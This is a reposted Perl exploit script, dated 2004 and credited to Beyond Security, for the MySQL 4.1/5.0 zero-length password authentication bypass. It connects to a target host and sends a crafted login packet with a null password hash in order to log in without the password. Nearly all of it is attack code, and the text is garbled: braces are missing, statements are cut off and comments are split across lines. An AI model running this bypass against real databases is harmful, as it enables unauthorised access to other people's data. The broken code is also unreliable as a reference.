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MySQL Authentication Bypass Exploit
来源:www.beyondsecurity.com 作者:Eli 发布时间:2004-07-12  

MySQL 4.1/5.0 zero-length password auth. bypass Exploit

# The script connects to MySQL and attempts to log in using a zero-length
# Based on the vuln found by NGSSecurity
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# <elik@beyondsecurity.com>
use strict;
use IO::Socket::INET;

usage() unless ((@ARGV >= 1) || (@ARGV <= 3));

my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
my $port = shift(@ARGV);
if (!$port)
$port = 3306; print "Using default MySQL port (3306)\n";

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
$socket or die "Cannot connect to host!\n";

# receive greeting
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
print "Not allowed to connect to MySQL!\n";
print "Received greeting:\n";
print "\n";

# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";

# break the username string into chars and rebuild it
my $binuser = pack("C*", unpack("C*", $username));

# send login caps packet with password
my $packet = "\x85\xa6".
"\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..

"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". #
username and pword hash length + NULL hash

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; #
continue NULL hash

substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; #
MySQL message length + packet number (1)

print "Sending caps packet:\n";
print "\n";
send $socket, $packet, 0;

# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";

my @list_bytes = unpack("C*", $reply);

#print "The fifth byte is: ", $list_bytes[4], "\n";
if (length(@list_bytes) >= 4)
print "Response insufficent\n";

#if ($reply eq $login_ok)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
print "Received OK reply, authentication successful!!\n";
print "Authentication failed!\n";

# close

sub usage
# print usage information
print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host>
<username> - The DB username to authenticate as
<host> - The host to connect to
[port] - The TCP port which MySQL is listening on (optional, default is

# do a hexdump of a string (assuming it's binary)
sub HexDump
my $buffer = $_[0];

# unpack it into chars
my @up = unpack("C*", $buffer);
my $pos=0;

# calculate matrix sizes
my $rows = int(@up/16);
my $leftover = int(@up%16);

for( my $row=0; $row < $rows; $row++, $pos+=16)
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+15];
my @line;
foreach my $val (@values)
push(@line, sprintf("%02X", $val));
print join(' ', @line), "\n";
# print last line
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+$leftover-1];
my @line;
foreach my $val (@values)
push(@line, sprintf("%02X", $val));
print join(' ', @line), "\n";

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